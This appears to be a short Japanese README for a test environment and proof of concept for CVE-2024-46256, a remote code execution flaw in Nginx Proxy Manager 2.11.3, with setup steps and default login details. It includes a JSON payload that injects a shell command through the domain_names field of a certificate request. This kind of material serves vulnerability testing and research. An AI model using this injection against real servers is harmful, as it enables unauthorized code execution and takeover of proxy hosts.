
CVE-2024-46256 ツール
docker-compose up -d
または自動スクリプトを使用できます:
python setup_environment.py
URL: http://localhost:81
初期設定完了後にテストを実施
デフォルト管理アカウントでログイン (メール: [email protected] / パスワード: changeme)
証明書発行関連機能へのアクセス権限を確認
CVE ID: CVE-2024-46256
製品: Nginx Proxy Manager
バージョン: 2.11.3
脆弱性タイプ: Remote Code Execution (RCE)
CVSS: High
PoCは、認証済みユーザーが証明書発行(例: Let's Encrypt)リクエスト過程でドメイン名フィールドにテンプレート/コマンドインジェクションを実行し、RCEを引き起こします。
ペイロード例(概念例):
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "[email protected]"
},
"provider": "letsencrypt"
}
OS: Windows 10
Docker: 最新バージョン
Nginx Proxy Manager: 2.11.3